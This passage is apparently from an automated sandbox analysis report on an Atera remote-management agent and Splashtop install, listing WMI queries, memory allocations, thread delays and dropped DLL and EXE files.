                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1C5CB7A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1C5E50D0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 20AA0B00000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 20AB8FC0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1BE62660000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1BE7ABE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2696EC80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2696F200000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 16BD0F80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 16BE95B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2E94ED70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2E967490000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 21719860000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 21731F40000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599433
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599109
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598562
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598453
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598344
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598234
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598125
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597438
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597327
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595871
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599778
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599653
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599265
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598706
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598025
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597919
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597483
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597347
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597218
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597109
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596987
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596745
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596422
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596047
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595655
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595546
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595215
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595030
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594810
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594577
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594356
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593806
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592811
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592484
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 2349
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 7356
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 8078
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 1444
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 4117
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 5755
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 6283
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 3519
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppAnnotation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dllJump to dropped file
